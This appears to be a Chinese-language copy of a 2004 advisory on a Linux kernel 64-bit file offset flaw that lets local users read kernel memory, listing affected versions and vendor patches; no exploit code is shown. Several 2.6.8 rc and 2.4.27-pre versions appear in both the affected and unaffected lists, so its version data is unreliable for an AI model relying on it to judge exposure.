Linux kernel 2.4.19 -pre3
Linux kernel 2.4.19 -pre2
Linux kernel 2.4.19 -pre1
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18 pre-8
Linux kernel 2.4.18 pre-7
Linux kernel 2.4.18 pre-6
Linux kernel 2.4.18 pre-5
Linux kernel 2.4.18 pre-4
Linux kernel 2.4.18 pre-3
Linux kernel 2.4.18 pre-2
Linux kernel 2.4.18 pre-1
Linux kernel 2.4.18 x86
+ Debian Linux 3.0 ia-32
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
+ Sun Cobalt RaQ 550
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.4 .0-test9
Linux kernel 2.4 .0-test8
Linux kernel 2.4 .0-test7
Linux kernel 2.4 .0-test6
Linux kernel 2.4 .0-test5
Linux kernel 2.4 .0-test4
Linux kernel 2.4 .0-test3
Linux kernel 2.4 .0-test2
Linux kernel 2.4 .0-test12
Linux kernel 2.4 .0-test11
Linux kernel 2.4 .0-test10
Linux kernel 2.4 .0-test1
Linux kernel 2.4
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.4.27 -pre5
Linux kernel 2.4.27 -pre4
Linux kernel 2.4.27 -pre3
Linux kernel 2.4.27 -pre2
Linux kernel 2.4.27 -pre1

- 不受影响的程序版本

Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.4.27 -pre5
Linux kernel 2.4.27 -pre4
Linux kernel 2.4.27 -pre3
Linux kernel 2.4.27 -pre2
Linux kernel 2.4.27 -pre1

- 漏洞讨论

A vulnerability in the Linux kernel in the 64-bit file offset handling code may allow malicious users to read kernel memory. This issue is due to a design error that causes the affected code to fail to properly validate file pointers.

An attacker may leverage this issue to read arbitrary Linux kernel memory. This could allow an attacker to read sensitive data such as cached passwords. This issue will certainly aid in further attacks against the affected computer.

It has been reported that the Linux 2.6.X kernel, although still vulnerable, might not be exploitable. This BID will be updated when more information becomes available.

- 漏洞利用

The following exploit has been provided by iSEC Security Research. This exploit is reported to trigger this issue on 2.4.X kernels and not 2.6.X kernels:

- 解决方案

SGI has made available Patch 10096 and advisory (20040804-01-U), correcting this and other vulnerabilities for systems running SGI ProPack 3.

Patch 10096 is available from:
ftp://patches.sgi.com/support/free/security/patches/ProPack/3/

Please see the referenced advisory for further details regarding obtaining and applying appropriate updates.

RedHat Linux has released advisory FEDORA-2004-251 that addresses this issue for Fedora Core 1. Fedora users may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Trustix Secure Linux has released advisory TSLSA-2004-0041 to address this, and other issues. Please see the referenced advisory for further information.

Red Hat has released advisory RHSA-2004:418-05 and RHSA-2004:413-07 and fixes to address this and other issues on Red Hat Linux Enterprise 2.1 and 3.0 platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Red Hat Fedora has released advisory FEDORA-2004-247 along with fixes dealing with this issue. Please see the referenced advisory for further details.

SuSE has released advisory SUSE-SA:2004:024 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Red Hat has released advisory RHSA-2004:327-09 along with fixes to address this issue for Red Hat Enterprise Linux 2.1 for Itanium processors. Please see the referenced advisory for further information.

Gentoo has released advisory GLSA 200408-24 to address this issue. Please see the attached advisory for further information on how to upgrade the kernel on Gentoo computers.

Mandrake has released an advisory (MDKSA-2004:087) to address this issue. Please see the referenced advisory for more information.

Conectiva has released an advisory (CLA-2004:879) to address this issue. Please see the referenced advisory for more information.

VMware has released an advisory dealing with this issue for their ESX Server virtual machine packages. Please see the Web reference for more information.


VMWare ESX Server 2.0.1

VMWare ESX Server 2.1.1

VMWare ESX Server 2.1.2

Linux kernel 2.4.18

Linux kernel 2.4.19

Linux kernel 2.4.21

Linux kernel 2.4.22

Linux kernel 2.4.25

Linux kernel 2.6.3

Linux kernel 2.6.4

Linux kernel 2.6.5

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站